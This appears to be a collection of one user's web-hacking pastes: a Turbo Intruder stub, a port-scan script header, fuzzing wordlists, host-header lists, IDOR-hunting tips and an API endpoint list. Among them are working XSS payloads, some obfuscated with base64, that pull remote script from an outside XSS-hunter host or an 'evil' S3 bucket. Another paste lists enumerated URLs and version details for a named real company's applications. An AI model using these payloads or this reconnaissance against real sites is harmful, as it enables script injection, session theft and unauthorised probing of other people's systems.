Uyavuz24

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1, # if you increase this from 1, you may get false positives
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

Uyavuz24

#!/bin/bash
#Performs port scan using nmap

print_usage() {
cat << _EOF_
        Utility to scan open ports. Can be used to scan ports for a domain or a list of domains specified in a file.
        Example Usage:
                -h, --help              Show brief help
                -d, --domain            Domain name or ip to scan
                -f, --file              Spefify a file containing domains/IPs to scan

Uyavuz24

000000
000001
000002
000003
000004
000005
000006
000007
000008
000009

Uyavuz24

/
!
!=
&&
*
*&
*.*
*?
*?*
.../.../.../

Uyavuz24

X-Forwarded-Host:
Host:
Referer:
X-Forwarded-For:

Uyavuz24

/
/*
/*.*
/*?
/*?*
/.../.../.../
/./
//
///
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Uyavuz24

<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!!
<svg/onload=alert(1)> //this is everywhere
<img src=x onerror=alert(document.domain)>  //this is also everywhere
"><script src=https://ubey.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)')  //For use where URI's are taken as input.
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags 

Uyavuz24

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0

http://apps.bentley.com:80/claimsviewerims
http://apps.bentley.com:80/claimsviewerims/default.aspx
http://apps.bentley.com:80/srmanager
http://apps.bentley.com:80/srmanager/AccountSRs
http://apps.bentley.com:80/srmanager/AccountSRs/SRList
http://apps.bentley.com:80/srmanager/Billing
http://apps.bentley.com:80/srmanager/Billing/ProblemArea
http://apps.bentley.com:80/srmanager/Billing/ProblemAreaContact

Uyavuz24

* If worldist can't find anything on api, use hakrawler
* every domain could have an api. add jSON extension to endpoints and see response
* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features)
* Some endpoints will return you UUID as a response to e-mail adress etc...
* If there is no leak of User ID, just swap with user id of another account you created
* Look for permissions in every endpoint
* change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, Arjun it
* Use all HTTP Request methods
* Look for IDORs in HTTP headers and body

Uyavuz24

/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents